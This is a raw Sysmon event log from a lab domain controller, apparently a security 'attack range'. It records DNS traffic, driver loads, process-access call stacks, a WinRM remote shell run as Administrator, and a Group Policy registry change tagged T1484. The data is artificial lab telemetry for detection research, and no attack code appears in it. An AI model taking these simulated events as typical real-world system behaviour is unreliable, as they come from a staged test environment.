12:01:14.812{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local64559- 354300x80000000000000003102Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.558{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local63663- 
22542200x80000000000000003101Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.516{266CAFBE-647D-6064-3000-00000000AE01}2648win-dc-8920fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe 644600x80000000000000003113Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:39.159C:\Windows\System32\drivers\xenvbd.sysMD5=8278E2B5383D2F5ED2583AC10E68E82C,SHA256=31DC4BF6BD29D3AED3588FE5A843BBD6EB6FF9D835555F7107768BA5F4E4326D,IMPHASH=B32CBE28AF26D0BACA98C88509F8A67CtrueAmazon Web Services, Inc.Valid 644600x80000000000000003112Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:40.534C:\Windows\System32\drivers\xenvbd.sysMD5=8278E2B5383D2F5ED2583AC10E68E82C,SHA256=31DC4BF6BD29D3AED3588FE5A843BBD6EB6FF9D835555F7107768BA5F4E4326D,IMPHASH=B32CBE28AF26D0BACA98C88509F8A67CtrueAmazon Web Services, Inc.Valid 644600x80000000000000003111Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:39.143C:\Windows\System32\drivers\xencrsh.sysMD5=8498E8240422067AF19398BA0C9E71BD,SHA256=8763BD78E6D2A5C4974EE2C917069C212FA6B5E138B1DFAF3D923EC7BDA8CCE0,IMPHASH=5A51E368D0D191BA922C89AD12551EF4trueAmazon Web Services, Inc.Valid 354300x80000000000000003110Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.699{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local57735- 354300x80000000000000003109Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.482{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61505- 
22542200x80000000000000003108Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.799{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.1460-C:\Windows\System32\lsass.exe 23542300x80000000000000003107Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:18.111{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=50DFD9C754F9AE7407C4295EBC5545B4,SHA256=E5D3E4C59A3936529FDFE648E7CF91491E9FE492276E970FF12B2E82E2DEB392,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000003116Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:17.714{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local57735- 354300x80000000000000003115Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:17.496{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local61505- 354300x80000000000000003114Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:17.372{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58642- 354300x80000000000000003120Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:19.353{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54225- 354300x80000000000000003119Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:18.918{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:f8e0:fca5:d9d:ffff-54224-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x80000000000000003118Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:18.918{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local54224-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x80000000000000003117Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:18.386{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local58642- 354300x80000000000000003121Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:20.355{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local54225- 354300x80000000000000003128Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:21.511{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local54224- 354300x80000000000000003127Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:21.511{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local61263- 
354300x80000000000000003126Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:21.511{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local54226- 354300x80000000000000003125Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:20.949{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-892.attackrange.local137netbios-nsfalse10.0.1.12-137netbios-ns 354300x80000000000000003124Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:20.497{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61263- 354300x80000000000000003123Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:20.497{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54224- 354300x80000000000000003122Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:20.497{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54226- 10341000x80000000000000003184Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.986{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6494-6064-7D00-00000000AE01}5096C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003183Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.955{266CAFBE-6494-6064-7E00-00000000AE01}51084132C:\Windows\system32\conhost.exe{266CAFBE-6494-6064-7D00-00000000AE01}5096C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003182Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.939{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6494-6064-7E00-00000000AE01}5108C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003181Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.939{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003180Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.939{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003179Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.939{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003178Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.939{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003177Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.939{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003176Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.939{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003175Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.939{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003174Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.939{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003173Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.939{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003172Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.939{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6494-6064-7D00-00000000AE01}5096C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003171Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.939{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6494-6064-7D00-00000000AE01}5096C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003170Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.939{266CAFBE-6494-6064-7D00-00000000AE01}5096C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-648A-6064-D902-060000000000}0x602d90HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000003169Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.924{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000003168Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.908{266CAFBE-646C-6064-1000-00000000AE01}1124NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\security\templates\policies\tmpgptfl.infMD5=F443C7B00E42C58336E9113C4B92A1EA,SHA256=01406B7BD612A8321213382482E44EA2C7B5467B57E17E9C135EAB2A8221FAEA,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000003167Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1484SetValue2021-03-31 12:01:24.893{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\MaxNoGPOListChangesIntervalDWORD (0x000003c0) 10341000x80000000000000003166Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.877{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6494-6064-7C00-00000000AE01}5044C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003165Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.846{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003164Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
